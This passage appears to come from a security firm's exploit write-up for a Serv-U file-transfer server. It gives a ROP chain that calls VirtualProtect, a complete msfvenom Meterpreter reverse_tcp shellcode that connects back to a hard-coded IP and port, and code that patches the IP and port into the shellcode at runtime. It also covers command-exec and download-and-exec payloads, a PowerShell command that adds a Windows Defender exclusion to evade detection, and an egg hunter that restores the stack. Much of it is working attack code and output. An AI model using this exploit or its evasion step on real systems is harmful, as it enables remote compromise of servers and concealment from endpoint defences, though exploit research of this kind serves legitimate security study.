                # payload buffer before writing the next value to the buffer.
ret             # Return to the next gadget
```

Finally I populate the first parameter: the address of our stack. The gadgets aren't perfect for this operation, but they work:

```
# 1st gadget
push rbp                # Push an address near our stack onto the head of the stack.
pop rax                 # Pop the address off the stack into rax so that rax now contains the address of the stack.
add byte ptr [rax], al  # Effective no operation in this context
ret                     # Return to next gadget

# 2nd gadget
mov rcx, rax            # Put the (approximate) address of the stack into rcx
ret
```

At this point I have populated the registers and I just need to call `VirtualProtect` to make our shellcode executable:

```
# Assuming rax holds the address of a pointer to VirtualProtect (jmp [rax] dereferences it)
jmp [rax]
ret
```

And that's it! The part of the stack on which our shellcode resides is now executable.

### Shellcode
I took standard shellcode generated by `msfvenom` and patched it at exploit runtime to do my bidding. For example, consider the Metasploit-compatible shellcode stager. It's generated like so:

```
[2021-10-19T18:47:49Z] root@h:/ehome/haggis# msfvenom  -p windows/x64/meterpreter/reverse_tcp LHOST=192.153.76.22 LPORT=443 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x01\xbb\xc0\x99\x4c\x16\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";
```

The connect-back port and IP address, which the shellcode uses to download the second-stage shellcode, are at these offsets:

```
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00"
"PP"   # connect-back port       @ offs 244
"HHHH" # connect-back IP address @ offs 246 
"\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
"\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
"\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
"\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
"\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
"\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58"
```

My exploit simply patches in the IP:port specified on the command line at runtime. This makes it easy for the user/attacker to point the exploit at arbitrary shellcode stagers, [Sliver](https://github.com/BishopFox/sliver) instances, or Metasploit instances without having to generate new shellcode every time.
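
The patching step can be sketched as follows. This is a minimal illustration rather than the exploit's actual code: `patch_endpoint`, `PORT_OFFSET`, and `IP_OFFSET` are hypothetical names, and the template is assumed to carry the `PP` and `HHHH` placeholders at offsets 244 and 246 as in the listing above. Both values are written in network byte order because they sit inside a `sockaddr_in`-style structure (the preceding `\x02\x00` bytes are the `AF_INET` family field). The template here is zero filler, not real shellcode.

```python
import socket
import struct

PORT_OFFSET = 244  # offset of the "PP" placeholder in the listing above
IP_OFFSET = 246    # offset of the "HHHH" placeholder in the listing above


def patch_endpoint(template: bytes, ip: str, port: int) -> bytes:
    """Return a copy of template with the port and IPv4 address filled in."""
    if template[PORT_OFFSET:PORT_OFFSET + 2] != b"PP":
        raise ValueError("port placeholder not found at expected offset")
    if template[IP_OFFSET:IP_OFFSET + 4] != b"HHHH":
        raise ValueError("IP placeholder not found at expected offset")
    patched = bytearray(template)
    patched[PORT_OFFSET:PORT_OFFSET + 2] = struct.pack(">H", port)  # big-endian port
    patched[IP_OFFSET:IP_OFFSET + 4] = socket.inet_aton(ip)         # 4 raw address bytes
    return bytes(patched)


# Stand-in template: zero bytes instead of real shellcode, placeholders in place.
template = bytes(244) + b"PP" + b"HHHH" + bytes(16)
patched = patch_endpoint(template, "192.153.76.22", 443)
```

With those arguments, the bytes at offsets 244 to 249 become `01 bb c0 99 4c 16`, the same six bytes that appear hard-coded in the unpatched shellcode listing.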

I used the same trick for the command exec shellcode, which simply tacks on the user-specified commands to the end of the shellcode:

```python
shellcode = (
     b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
     b"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
     b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
     b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
     b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
     b"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
     b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
     b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
     b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
     b"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
     b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
     b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
     b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
     b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
     b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
     b"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
     b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
     b"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"
)

rop[offs_NOP_sled+offs_NOP_sled_padding+267:] = shellcode + cmd.encode() + b"\x00"
```

Again, this saves the user from generating new shellcode every time. Finally, I implemented a download + exec feature, which accepts a user-specified URL, downloads an executable from the URL to `C:\Windows\Temp`, then runs it. One little wrinkle I added is a PowerShell command that excludes `C:\Windows\Temp` from Windows Defender virus/malware scans so you can run completely unobfuscated [Sliver](https://github.com/BishopFox/sliver)/Meterpreter payloads without getting tripped up by Microsoft endpoint security.

The PowerShell command to do this is:

```powershell
powershell -Command "& {Add-MpPreference -ExclusionPath c:\windows\temp}"
```

Without that command you'll find Windows Defender alerts on almost any payload you care to drop. Note: I don't recommend this for red team engagements because you'll still get caught by a zillion other controls. But for simple use cases, it's more than sufficient to pop a connect-back shell or [Sliver](https://github.com/BishopFox/sliver) session.

### I Almost Forgot About Unpivoting the Stack
Sometimes it's necessary to return the stack pointer to where it came from so that the exploited process can resume execution and handle any errors/exceptions tidily. As written, this exploit crashes Serv-U, although the service restarts automatically. A crash is unacceptable in a lot of scenarios, and making the exploit not crash is left as an exercise for the reader.

However, returning the stack to normal is an interesting problem because in ROP we don't usually save the stack pointer before pivoting to a different stack - the malicious ROP one. Getting it back generally involves querying the Thread Environment Block ("TEB") via the `gs:` segment register on 64-bit Intel/AMD Windows. The TEB is maintained by the operating system and holds per-thread metadata, including the bounds of the thread's stack.

The TEB starts at `gs:[0]` and stores a pointer to itself at `gs:[0x30]`. (The pointer to the Process Environment Block ("PEB") lives at `gs:[0x60]` and isn't needed here.) Offset `0x10` of the TEB holds the stack limit, the lowest currently committed address of the thread's stack, which makes a convenient starting point for a search towards higher addresses. The following code can be used to read it:

```
# recover the original stack
mov rax, 0x30
mov rax, qword gs:[rax]     # Read the TEB's own address (self pointer) out of the TEB
add rax, 0x10               # Offset in the TEB of the stack limit
mov rax, qword ptr [rax]    # Dereference [rax] to read the stack limit out of the TEB
mov rdi, rax                # Store the stack limit (lowest stack address) in rdi
```
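
For reference, the leading fields of the 64-bit TEB (the embedded `NT_TIB` structure) can be modelled with `ctypes` to check the two offsets used above. This is an illustrative sketch: the class name `NtTib64` is hypothetical, the field names follow `NT_TIB64` in `winnt.h`, and fixed-width integer fields are used so the layout is the same on whichever platform runs the snippet.

```python
import ctypes


class NtTib64(ctypes.Structure):
    """Leading fields of the x64 TEB, following NT_TIB64 in winnt.h."""
    _fields_ = [
        ("ExceptionList", ctypes.c_uint64),
        ("StackBase", ctypes.c_uint64),             # highest stack address
        ("StackLimit", ctypes.c_uint64),            # lowest committed stack address
        ("SubSystemTib", ctypes.c_uint64),
        ("FiberData", ctypes.c_uint64),
        ("ArbitraryUserPointer", ctypes.c_uint64),
        ("Self", ctypes.c_uint64),                  # linear address of this TEB
    ]


print(hex(NtTib64.Self.offset))        # 0x30: the field read via gs:[0x30]
print(hex(NtTib64.StackLimit.offset))  # 0x10: the field read after `add rax, 0x10`
```

Reading `gs:[0x30]` therefore yields the address of the TEB itself, and adding `0x10` lands on the stack-limit field.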

In order to return `rsp` to the same address it contained at the very beginning of the exploit - at the point when `call r9` first occurred - I need to find the precise address of the top of the old stack frame. This turns out to be easy because the stack frame contains return addresses in `Serv-U.dll`, which as we saw earlier does not support ASLR. As a result I can simply look at a stack trace taken at the point `call r9` is executed and make note of the addresses there.

For example, consider this stack trace taken from exactly the scenario just described:

```
0:013> k
 # Child-SP          RetAddr               Call Site
00 0000009d`d2aff320 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
01 0000009d`d2aff380 00000000`7218f41b     LIBEAY32!EVP_rc4_40+0x488
02 0000009d`d2aff3d0 00000000`7210efaa     LIBEAY32!FINGERPRINT_premain+0x291b
03 0000009d`d2aff410 00000001`8016086c     LIBEAY32!EVP_EncryptUpdate+0xda
04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
05 0000009d`d2aff4a0 00000001`80141263     Serv_U!CUPnPNotifyEvent::SetTimeout+0x3aa5
06 0000009d`d2aff4e0 00000001`80144fb0     Serv_U!CUPnPNotifyEvent::SetTimeout+0x3573
07 0000009d`d2aff580 00000200`577f8dd7     Serv_U!CUPnPNotifyEvent::SetTimeout+0x72c0
08 0000009d`d2aff650 00000200`577f8c5c     RhinoNET!CRhinoSocket::ProcessReceiveBuffer+0x33
09 0000009d`d2aff690 00000200`577f6c4e     RhinoNET!CRhinoSocket::OnReceive+0x170
0a 0000009d`d2aff6e0 00000200`577f32eb     RhinoNET!CRhinoProductSocket::OnReceive+0x3e
0b 0000009d`d2aff710 00000200`577f356b     RhinoNET!CAsyncSocketX::DoCallBack+0x107
0c 0000009d`d2aff740 00000200`577f350f     RhinoNET!CAsyncSocketX::ProcessAuxQueue+0x53
0d 0000009d`d2aff770 00007fff`5ffda399     RhinoNET!CSocketWndX::OnSocketNotify+0x13
0e 0000009d`d2aff7a0 00007fff`5ffd97af     mfc140u!CWnd::OnWndMsg+0xba9 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2698] 
0f 0000009d`d2aff920 00007fff`5ffd7093     mfc140u!CWnd::WindowProc+0x3f [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2099] 
10 0000009d`d2aff960 00007fff`5ffd7464     mfc140u!AfxCallWndProc+0x123 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 265] 
11 0000009d`d2affa50 00007fff`5fe7a509     mfc140u!AfxWndProc+0x54 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 417] 
12 0000009d`d2affa90 00007fff`90c60089     mfc140u!AfxWndProcBase+0x49 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\afxstate.cpp @ 299] 
13 0000009d`d2affad0 00007fff`90c5fa02     USER32!UserCallWinProcCheckWow+0x319
14 0000009d`d2affc60 00000001`8016ea75     USER32!DispatchMessageWorker+0x1d2
15 0000009d`d2affce0 00000001`8016eaed     Serv_U!CUPnPNotifyEvent::SetTimeout+0x30d85
16 0000009d`d2affd50 00007fff`8ee36b4c     Serv_U!CUPnPNotifyEvent::SetTimeout+0x30dfd
17 0000009d`d2affd80 00007fff`90954ed0     ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x4c
18 0000009d`d2affdb0 00007fff`9124e20b     KERNEL32!BaseThreadInitThunk+0x10
19 0000009d`d2affde0 00000000`00000000     ntdll!RtlUserThreadStart+0x2b
```

The first Serv-U stack frame is at index #4 and contains the saved return address for the instruction at `Serv_U!CUPnPNotifyEvent::SetTimeout + 0x22b7c`:

```
04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
```

The return address is `0x180141795` *and always will be* due to the absence of ASLR. Therefore to find the original stack I just hunt for `0x80141795` (the low 4 bytes, or DWORD, of the 64-bit address `0x0000000180141795`) starting at the stack address I read via `gs:[0x30]`. I built the following egg hunter:

```
# Egg hunter for the value 0x80141795 starting at the stack address read via gs:[0x30].
# No egg-not-found error handling because if this code is running then the 
# stack frame we're looking for is guaranteed to exist.
mov eax, 0x80141795           # low DWORD of the saved RIP we want to find
mov rcx, 0x4000               # max number of DWORDs to compare (0x10000 bytes)
cld                           # clear DF, direction flag, so rdi counts upwards
repne scasd eax, dword [rdi]  # find the saved return address starting @ [rdi]
mov rax, rdi                  # save the found stack address in rax    
mov rdx, 0x140                # the top of the original stack frame is...
sub rax, rdx                  # ...0x140 bytes upwards
mov rsp, rax                  # pivot to the new (old!) stack
```

You'll notice that some math is being done to subtract 0x140 from `rax` before writing it to `rsp`. This is to account for the fact that our egg - the saved return address - was not at the top of the stack frame list. In fact, it was index #4 and I need `rsp` to point at the frame index #0:

```
# Child-SP           RetAddr               Call Site
00 0000009d`d2aff320 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
...
04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
```

The offset on the stack between #4 and #0 is `0x9dd2aff460 - 0x9dd2aff320 = 0x140` so I subtract that amount from `rax` before setting the stack pointer, `rsp`.
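
The arithmetic and the scan can be checked offline with a small Python model. This is only a sketch: `windbg_addr` and `scan_dwords` are hypothetical helpers, and the buffer is a synthetic stand-in for stack memory, not a dump from a real process. One detail worth modelling is that `scasd` advances `rdi` after every comparison, so on a match the helper returns the position just past the matching DWORD, as the CPU would leave it.

```python
import struct


def windbg_addr(text: str) -> int:
    """Parse a WinDbg-style 64-bit address such as 0000009d`d2aff460."""
    return int(text.replace("`", ""), 16)


def scan_dwords(memory: bytes, start: int, egg: int, count: int):
    """Model `repne scasd`: compare up to `count` DWORDs beginning at `start`.

    Returns the index just past the matching DWORD (where rdi would end up),
    or None if the egg is not found within the buffer or `count` comparisons.
    """
    pos = start
    for _ in range(count):
        if pos + 4 > len(memory):
            break
        (value,) = struct.unpack_from("<I", memory, pos)
        pos += 4                      # scasd always advances rdi by 4
        if value == egg:
            return pos
    return None


# Distance between frame #4 and frame #0 in the stack trace above.
frame_offset = windbg_addr("0000009d`d2aff460") - windbg_addr("0000009d`d2aff320")

# Synthetic "stack": zero filler with the 8-byte return address at offset 0x200.
memory = bytearray(0x400)
struct.pack_into("<Q", memory, 0x200, 0x0000000180141795)

rdi = scan_dwords(bytes(memory), 0, 0x80141795, 0x4000)
print(hex(frame_offset), hex(rdi))  # 0x140 0x204
```

Because the address is stored little-endian, its low DWORD comes first in memory, which is why a 4-byte compare is enough to locate the 8-byte saved return address.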

One of the beautiful things about Radare2 is that its `rasm2` tool can assemble code straight into opcode bytes for shellcode. So the above code becomes:

```
% cat /tmp/s.asm
mov eax, 0x80141795
mov rcx, 0x4000
cld
repne scasd eax, dword [rdi]
mov rax, rdi
mov rdx, 0x140
sub rax, rdx
mov rsp, rax

% cat /tmp/s.asm | rasm2 -a x86 -b 64 -
b89517148048c7c100400000fcf2af4889f848c7c2400100004829d04889c4
```

Simple and elegant. 
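
To use the assembled bytes from Python, the hex string can be converted with `bytes.fromhex`. The sketch below does that and, as a sanity check, reads the three immediates back out of the encoding. The variable names are specific to this illustration, and the immediate offsets (1, 8, and 21) were derived by hand from the instruction encodings in the `rasm2` output above.

```python
import struct

# Hex string emitted by rasm2 for the egg hunter above.
EGG_HUNTER_HEX = "b89517148048c7c100400000fcf2af4889f848c7c2400100004829d04889c4"
egg_hunter = bytes.fromhex(EGG_HUNTER_HEX)

# Each immediate is a little-endian 32-bit value following its opcode bytes.
(egg,) = struct.unpack_from("<I", egg_hunter, 1)        # mov eax, imm32
(count,) = struct.unpack_from("<I", egg_hunter, 8)      # mov rcx, imm32
(adjust,) = struct.unpack_from("<I", egg_hunter, 21)    # mov rdx, imm32

print(len(egg_hunter), hex(egg), hex(count), hex(adjust))
# 31 0x80141795 0x4000 0x140
```

Checking the immediates this way is a cheap guard against pasting a stale or truncated hex string when the egg value or frame offset changes.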

Lastly, I could return most of the registers to their pre-exploit values before returning control of execution to the old stack; doing so is left as an exercise for the reader.

## In Summary
This was a fun exploit and I got lucky a few times! The fact that ASLR was disabled on `Serv-U.dll` was crazy lucky.

It should also be pointed out that the exploit is currently hard-coded for Serv-U 15.2.3.717. Building it against other Serv-U versions would require a little work to recalculate the ROP gadget addresses in `Serv-U.dll`. Hopefully we'd find the same gadgets in the other versions of Serv-U, but I haven't looked yet.

Let us know what you think - connect with us on social media and follow us on GitHub for more exploits!

For more information on our continuous offensive security platform, you can get in touch with us via the [Cosmos page](https://bishopfox.com/platform).
